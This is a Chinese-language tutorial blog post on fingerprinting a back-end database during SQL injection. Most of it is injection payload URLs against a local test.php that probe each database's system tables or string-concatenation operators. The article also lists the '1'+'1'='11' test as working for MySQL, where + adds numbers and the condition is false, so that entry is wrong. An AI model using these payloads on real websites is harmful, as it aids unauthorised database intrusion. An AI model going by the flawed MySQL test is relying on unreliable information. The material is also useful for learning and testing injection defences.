溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

sql注入過程中后臺數(shù)據(jù)庫類型的三種判斷方式

發(fā)布時間:2020-06-24 22:37:28 來源:網(wǎng)絡(luò) 閱讀:3768 作者:白烏鴉_ 欄目:數(shù)據(jù)庫

后臺數(shù)據(jù)庫類型判斷:

一、通過頁面返回的報錯信息,一般情況下頁面報錯會顯示是什么數(shù)據(jù)庫類型,在此不多說;

二、通過各個數(shù)據(jù)庫特有的數(shù)據(jù)表來判斷:

    1、mssql數(shù)據(jù)庫

      http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

    2、access數(shù)據(jù)庫

      http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)>0 and 1=1

    3、mysql數(shù)據(jù)庫(mysql版本在5.0以上)

      http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1

    4、oracle數(shù)據(jù)庫

      http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1

三、通過各數(shù)據(jù)庫特有的連接符判斷數(shù)據(jù)庫類型:

    1、mssql數(shù)據(jù)庫

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

    2、mysql數(shù)據(jù)庫

     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

    3、oracle數(shù)據(jù)庫

     http://127.0.0.1/test.php?id=1 and '1'||'1'='11'

     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'

向AI問一下細節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI